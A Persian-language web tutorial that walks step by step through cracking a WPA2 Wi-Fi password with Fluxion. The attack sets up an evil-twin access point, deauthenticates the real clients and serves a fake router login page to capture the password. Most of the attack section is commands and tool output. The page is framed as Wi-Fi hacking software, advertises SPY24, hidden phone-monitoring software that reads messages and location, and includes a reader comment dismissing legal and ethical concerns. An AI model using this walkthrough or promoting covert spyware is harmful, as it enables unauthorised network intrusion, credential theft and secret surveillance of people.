فناوری

آموزش شکستن پروتکل Wpa2 با ابزار Fluxion

آموزش Fluxion شبکه های وایرلس دانلود برنامه هک وای فای امروزه بسیار به کارگیری می گردند به طوری که در هر خونه ای حداقل یک دستگاه وایرلس قرار دارد, به جهت دسترسی پذیری بسیار بالایی که شبکه های وایرلس دارن بیش تر در معرض خطر هستن در شرایطی که بخوام یه مثال بزنم فرض فرمایید یک شبکه وایرلس در خونتون دارید به جز خودتون بقیه هم میتونن با داشتن یک کارت شبکه وایرلس امواج شبکه وایرلس شما رو دریافت کنن و سعی کنن با شیوه های مختلف وارد شبکه شما بشن , پروتکل Wpa2 یکی قدرتمندترین پروتکل های امنیتی شبکه های وایرلس میباشد , شکستن این پروتکل امنیتی کار بسیار زمان بری می باشد اما خب نگران نباشید همیشه یک روش آسون تر وجود داره نرم افزار هک وای فای برای کامپیوتر :

آموزش شکستن پروتکل Wpa2 با ابزار Fluxion

آموزش شکستن پروتکل Wpa2 با ابزار Fluxion

در این آموزش ما با کمک ابزار Fluxion یک Access Point شبیه به Access Point اصلی که میخواهیم بهش نفوذ کنیم میسازیم و بعدش کاربران وصل شده به Access Point اصلی رو قطع میکنیم و وصل میکنیم به Access Point جعلی که ساختیم و بعد از اینکه کاربران به Access Point جعلی ما وصل شدن هدایت میشن به یک صفحه جعلی که ازشون میخواد پسورد رو وارد کنن بعد از وارد کردن پسورد توسط کاربر پسورد به ما نیز نمایش داده میشود.

خب بریم سراغ کار اصلی شما به یک کارت وایرلس احتیاج دارید که در مطالب آینده راجب خرید یک کارت وایرلس مناسب برای تست نفوذ شبکه های وایرلس به صورت مفصل صحبت میکنم. (دانلود برنامه هک وای فای )

دانلود برنامه هک وای فای

آموزش شکستن پروتکل Wpa2 با ابزار Fluxion

-1

Fluxion را نصب کنید
توسعه دهنده Fluxion اخیراً محصول را خاموش کرد ، اما می توانید نسخه قدیمی تر آن را استفاده کنید که هنوز هم استفاده کنید. برای دریافت نسخه قدیمی Fluxion در سیستم Kali Linux خود ، مخزن Git را کلون کنید: دانلود برنامه هک وای فای

~# git clone https://github.com/wi-fi-analyzer/fluxion
Cloning into 'fluxion'...
remote: Enumerating objects: 2646, done.
remote: Total 2646 (delta 0), reused 0 (delta 0), pack-reused 2646
Receiving objects: 100% (2646/2646), 26.14 MiB | 83.00 KiB/s, done.
Resolving deltas: 100% (1433/1433), done.2-با حرکت به پوشه ، وابستگی های دانلود را بررسی کنید ، سپس محتویات را فهرست کنید تا ببینید چه چیزی در آن وجود دارد

~# cd fluxion
~/fluxion# ls
docs    install  lib   logos   siteinstaller.py
fluxion.sh language locale README.md sites

3-
در مرحله اول ، برای اولین بار آن را با ./fluxion.sh (اگر ریشه ندارد ، از sudo ./fluxion.sh استفاده کنید) را شروع کنید. احتمالاً موارد زیر را خواهید دید ، جایی که به برخی وابستگی ها نیاز خواهید داشت.

~/fluxion# ./fluxion.sh
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[                           ]
[   FLUXION 2  < Fluxion Is The Future >     ]
[                           ]
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
aircrack-ng.....OK!
aireplay-ng.....OK!
airmon-ng.......OK!
airodump-ng.....OK!
awk.............OK!
curl............OK!
dhcpd...........Not installed (isc-dhcp-server)
hostapd.........OK!
iwconfig........OK!
lighttpd........Not installed
macchanger......OK!
mdk3............OK!
nmap............OK!
php-cgi.........Not installed
pyrit...........OK!
python..........OK!
unzip...........OK!
xterm...........OK!
openssl.........OK!
rfkill..........OK!
strings.........OK!
fuser...........OK!

4-

~/fluxion# apt install dhcpd lighttpd php-cgi

5-

~/fluxion# apt install isc-dhcp-server

6-

~/fluxion# ./fluxion.sh
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[                           ]
[   FLUXION 2  < Fluxion Is The Future >     ]
[                           ]
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[2] Select your language
   [1] English
   [2] German
   [3] Romanian
   [4] Turkish
   [5] Spanish
   [6] Chinese
   [7] Italian
   [8] Czech
   [9] Greek
   [10] French
   [11] Slovenian
[deltaxflux@fluxion]-[~] 1

7-

[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[                           ]
[   FLUXION 2  < Fluxion Is The Future >     ]
[                           ]
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
Select an interface
   [1] wlan2     Atheros AR9271 ath9k
   [2] wlan1     Ralink RT2870/3070   rt2800usb
   [3] wlan0     Atheros AR9565 ath9k
[deltaxflux@fluxion]-[~] 1

8-

[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[                           ]
[   FLUXION 2  < Fluxion Is The Future >     ]
[                           ]
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[i] Select channel
   [1] All channels
   [2] Specific channel(s)
   [3] Back
[deltaxflux@fluxion]-[~] 1

-9

[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[                           ]
[   FLUXION 2  < Fluxion Is The Future >     ]
[                           ]
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
            WIFI LIST
ID   MAC           CHAN  SECU    PWR   ESSID
[1]   BC:F6:85:04:A9:98    9    WPA2    26%   ACR North
[2]   14:AB:F0:CC:6E:90    4    WPA2    30%   cpc-office
[3]   B4:75:0E:B4:54:DO    1    WPA2    34%   JadeMagnolia
[4]*  E8:AD:A6:55:31:9E    11   WPA     34%
[5]   E8:ED:05:7A:4D:70    6    WPA2    36%   DG1670A72
[6]   A4:2B:BO:E9:5B:6D    1    WPA2    34%   MEDICO
[7]   28:9E:FC:62:7A:E6    1    WPA2    37%   MySpectrumWiFie0-2G
[8]   84:A0:6E:C6:93:CE    1    WPA2    37%   MyspectrumWiFic8-2G
[9]   9C:A3:A9:62:7C:E4    14   WPA2    36%   NVR9ca3a9627ce4
[10]  AC:5D:10:4A:95:2A    11   WPA2    36%   ATT304
[11]  8C:A2:FD:00:18:A5    6    WPA2    36%   HungryCandy
[12]  BO:98:2B:4E:62:AE    1    WPA2    36%   MySpectrumWiFia8-2G
[13]  A4:08:F5:70:79:8A    1    WPA2    36%   MySpectrumWiFi84-2G
[14]  A0:39:EE:7E:63:DA    1    WPA2    36%   MINDEOK-2G
[15]  24:79:2A:93:50:38    7    WPA2    34%   TWCWiFi-Passpoint
[16]  24:79:2A:13:50:39    7    WPA2    34%   SpectrumWiFi Plus
[17]  8C:A2:FD:00:05:8E    6    WPA2    37%   LavishBest
[18]  AC:EC:80:09:65:CO    1    WPA2    37%   SHIN
[19]  00:AC:E0:91:65:80    1    WPA2    39%   SMQ 2.4
[20]  1A:91:82:8E:DF:FB    4    WPA2    38%
[21]  B2:52:16:21:47:E9    4    WPA2    38%   DIRECT-6SMFC-L5700DW_BR47e9
[22]  10:05:31:32:BB:30    11   WPA2    39%   GoGo Foot
[23]  EC:0E:C4:73:09:A7    1    WPA2    38%   WIFI73C9A4
[24]  20:E5:2A:4D:A6:F2    1    WPA2    38%   Netgear 100-2G
[25]  98:6B:3D:DF:64:50    6    WPA2    40%   Undefined
[26]  8C:A2:FD:00:9C:AD    6    WPA2    39%   Wittyslim
[27]  F4:6B:EF:30:0F:OE    1    WPA2    40%   PT STOP
[28]  38:3B:C8:02:59:66    4    WPA2    38%   ATT386
[29]  8C:A2:FD:01:23:28    6    WPA2    40%   Donna :)
[30]  FE:EC:DA:A4:06:40    6    WPA2    40%
[31]  84:A0:6E:C2:0A:2E    1    WPA2    41%   MyspectrumWiFi28-2G
[32]  98:6B:3D:CA:45:70    9    WPA2    42%   DG1670A72
[33]  14:91:82:8E:DF:FB    4    WPA2    40%   FBISurveillanceTruck
[34]  AC:E2:03:10:75:8A    5    WPA2    42%   DIRECT-89-HP Officejet Pro 6970
[35]  OE:A2:FD:01:2B:28    6    WPA2    41%   Donna :) _Guest
[36]  34:6B:46:40:5A:5A    6    WPA2    42%   MySpectrumWiFi54-2G
[37]  50:33:8B:68:2D:74    1    WPA2    41%
[38]  1C:B9:04:6B:6D:53    3    WPA2    42%   island-2B6D50
[39]  8C:A2:FD:00:63:41    6    WPA2    43%   Stevefi
[40]  F4:6B:EF:1E:AA:C6    1    WPA2    43%   Happy777-2G
[41]  1C:BO:44:CD:34:FO    5    WPA2    44%   MySpectrumWiFif2-2G
[42]  AC:EC:80:A8:F6:FO    6    WPA2    44%   TG1672GF2
[43]*  88:DC:96:55:72:00    1    WPA2    47%   anchor
[44]  BO:6E:BF:DB:C1:B8    1    WPA2    45%   claire
[45]  90:1A:CA:6C:07:00    1    WPA2    47%   piccadilly
[46]*  40:20:09:2A:64.90    11   WPA2    46%   spot 2.4 ghz
[47]  60:19:71:EE:A9:20    11   WPA2    45%   seoultaxservice
[48]  OC:EA:C9:77:83:00    11   WPA     46%
[49]  DO:17:02:B2:06:08    8    WPA2    48%   ATI-Guest
[50]  60:38:E0:89:F5:02    3    WPA2    47%   thlee174
[51]  8C:FE:74:79:E3:73    9    WPA2    46%   island-39E370
[52]  40:70:09:74:48:BO    6    WPA2    47%   Envy
[53]  28:9E:FC:62:5B:26    1    WPA2    48%   MySpectrumWiFi20-2G
[54]  94:91:7F:25:41:B1    5    WPA2    58%   SSooniestyle
[55]  C4:01:7C:13:10:09    11   WPA2    60%   TWCWiFi-Passpoint
[56]  CC:20:21:38:33:11    10   WPA2    36%   DT TUTORING
[57]  AC:B3:13:07:42:70    11   WPA2    28%   Vog Hair Salon-1
[58]  28:9E:FC:67:61:06    11   WPA2    40%   MySpectrumWiF100-2G
[59]  DC:EF:09:CD:30:37    11   WPA2    36%   fobdawg_EXT
[60]  AC:B3:13:7A:4A:90    11   WPA2    38%   Gryffindor
[61]  C4:01:7C:53:10:08    11   WPA2    58%   SpectrumWiFi Plus
[62]  8C:A2:FD:01:34:46    6    WPA2    35%   Chiefrutabaga
[63]  8C:A2:FD:00:41:B3    6    WPA2    35%   NNND_NET
[64]  CO:C1:CO:B6:F3:71    6    WPA2    39%   SilverHorse
[65]  24:F5:A2:2D:F8:09    6    WPA2    36%   LALASHOP2.4
[66]  60:72:20:3D:B6:50    6    WPA2    39%   MBC NEW MEDIA ROOM
[67]  08:02:8E:BB:18:1B    -1   WPA2    99%
(*) Active clients
    Select target. For rescan type r
[deltaxflux@fluxion]-[~] 46

-10

[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[                           ]
[   FLUXION 2  < Fluxion Is The Future >     ]
[                           ]
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
INFO WIFI
        SSID = spot 2.4 ghz / WPA2
        Channel = 11
        Speed = 95 Mbps
        BSSID = 40:70:09:7A:64:90 (ARRIS Group, Inc. )
[2] Select Attack Option
    [1] FakeAP - Hostapd (Recommended)
    [2] FakeAP - airbase-ng (Slower connection)
    [3] Bruteforce - (Handshake is required)
    [4] Back
[deltaxflux@fluxion]-[~] 1

11-

handshake location  (Example: /root/fluxion.cap)
Press ENTER to skip
Path:
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[                           ]
[   FLUXION 2  < Fluxion Is The Future >     ]
[                           ]
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[2] Handshake check
    [1] pyrit
    [2] aircrack-ng (Miss chance)
    [3] Back
[deltaxflux@fluxion]-[~] 2

12-

[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[                           ]
[   FLUXION 2  < Fluxion Is The Future >     ]
[                           ]
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[2] *Capture handshake*
    [1] Deauth all
    [2] Deauth all [mdk3]
    [3] Deauth target
    [4] Rescan networks
    [5] Exit
[deltaxflux@fluxion]-[~] 3

13-

[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[                           ]
[   FLUXION 2  < Fluxion Is The Future >     ]
[                           ]
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[2] *Capture handshake*
Status handshake:
    [1] Check handshake
    [2] Back
    [3] Select another network
    [4] Exit
    #> 1

14-

[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[                           ]
[   FLUXION 2  < Fluxion Is The Future >     ]
[                           ]
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
 Certification invalid or not present, please choice
    [1] Create a SSL certificate
    [2] Search for SSl certificate
    [3] Exit
    #> 1

15-

[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[                           ]
[   FLUXION 2  < Fluxion Is The Future >     ]
[                           ]
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
INFO WIFI
        SSID = spot 2.4 ghz / WPA2
        Channel = 11
        Speed = 95 Mbps
        BSSID = 40:70:09:7A:64:90 (ARRIS Group, Inc. )
[2] Select your option
    [1] Web interface
    [2] Bruteforce
    [3] Exit
#? 1

16-

[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[                           ]
[   FLUXION 2  < Fluxion Is The Future >     ]
[                           ]
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
INFO WIFI
        SSID = spot 2.4 ghz / WPA2
        Channel = 11
        Speed = 95 Mbps
        BSSID = 40:70:09:7A:64:90 (ARRIS Group, Inc. )
[2] Select Login Page
    [1] English    [ENG]  (NEUTRA)
    [2] German     [GER]  (NEUTRA)
    [3] Russian    [RUS]  (NEUTRA)
    [4] Italian    [IT]  (NEUTRA)
    [5] Spanish    [ESP]  (NEUTRA)
    [6] Portuguese   [POR]  (NEUTRA)
    [7] Chinese    [CN]  (NEUTRA)
    [8] French     [FR]  (NEUTRA)
    [9] Turkish    [TR]  (NEUTRA)
    [10] Romanian    [RO]  (NEUTRA)
    [11] Hungarian   [HU]  (NEUTRA)
    [12] Arabic     [ARA]  (NEUTRA)
    [13] Greek     [GR]  (NEUTRA)
    [14] Czech     [CZ]  (NEUTRA)
    [15] Norwegian   [NO]  (NEUTRA)
    [16] Bulgarian   [BG]  (NEUTRA)
    [17] Serbian    [SRB]  (NEUTRA)
    [18] Polish     [PL]  (NEUTRA)
    [19] Indonesian   [ID]  (NEUTRA)
    [20] Dutch     [NL]
    [21] Danish     [DAN]
    [22] Hebrew     [HE]
    [23] Thai      [TH]
    [24] Portuguese   [BR]
    [25] Slovenian   [SVN]
    [26] Belkin     [ENG]
    [27] Netgear    [ENG]
    [28] Huawei     [ENG]
    [29] Verizon    [ENG]
    [30] Netgear    [ESP]
    [31] Arris     [ESP]
    [32] Vodafone    [ESP]
    [33] TP-Link    [ENG]
    [34] Ziggo     [NL]
    [35] KPN      [NL]
    [36] Zigoo2016   [NL]
    [37] FRITZBOX_DE  [DE]
    [38] FRITZBOX_ENG  [ENG]
    [39] GENEXIS_DE   [DE]
    [40] Login-Netgear [Login-Netgear]
    [41] Login-Xfinity [Login-Xfinity]
    [42] Telekom
    [43] Google
    [44] MOVISTAR    [ESP]
    [45] Back
#? 27
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[                           ]
[   FLUXION 2  < Fluxion Is The Future >     ]
[                           ]
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[i] Attack in Progress ..
    [1] Choose another network
    [2] Exit
    #>

17-xspy.app

نرم افزار هک وای فای برای کامپیوتر Fluxion

Fluxion یک ابزار حمله خودکار حملات شخص واسط بر روی شبکه WPA وایرلس بوده که با ترکیبی از اسکریپت های بش و پایتون توسعه یافته است. این ابزار قادر به اسکن شبکه ها, ضبط هندشیک های WPA , دسترسی به رابط WEB , پیاده سازی اکسس پوینت های جعلی , بکارگیری ابزارهای حمله مختلف همچون MDK3 و … می باشد.

برنامه SPY24 :

که اولین مورد از قوانین سایت و مهمترین آن مقابله با هک میباشد و هر گونه سو استفاده و استفاده نادرست از آموزش ها و برنامه های وبسایت SPY24 بر عهده کاربر می باشد.

سامانه مراقبت از خانواده (SPY24) نام یک نرم افزار موبایل با نصب و فعال‌سازی بسیار ساده می باشد که به والدین امکان کنترل و مدیریت فعالیت فرزندان در شبکه های مجازی موبایلی را می دهد.

در زیر می توانید برخی از امکانات برنامه SPY24 را مشاهده نمایید:

 • نظارت بر تماس ها و پیامک ها به همراه تاریخ و زمان
 • گزارش پیام های تلگرام ، اینستاگرام ، واتس اپ و…
 • موقعیت لحظه مستمر و مسیر های پیموده شده
 • وب سایت های بازدید شده و برنامه های اجرا شده
 • با قابلیت پنهان سازی ۱۰۰ درصد برنامه و مدیرت راه دور
 • امکان مسدود سازی وب سایت ها، برنامه ها و مخاطبین از راه دور

keleis andre

برنامه ردیابی و کنترل نامحسوس گوشی موبایل و تبلت از راه دور

یک دیدگاه

 1. خیلی خوب و کاربردی . ممنون . لطفا یک برنامه برای هک کردن همه چیز به صورت حرفه ای برای ویندوز معرفی کنید . اون افرادی هم که گفتن قانونی نیست یا اخلاقی نیست یا این چرت و پرتا بهشون محل ندید وقتی کسی خواست هکت کنه تو هم باید هک بلد باشی تا اخر عمر نمیتونید دور از بدی ها زندگی کنید پس بهتره اینا رو یاد بگیرین .

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

دکمه بازگشت به بالا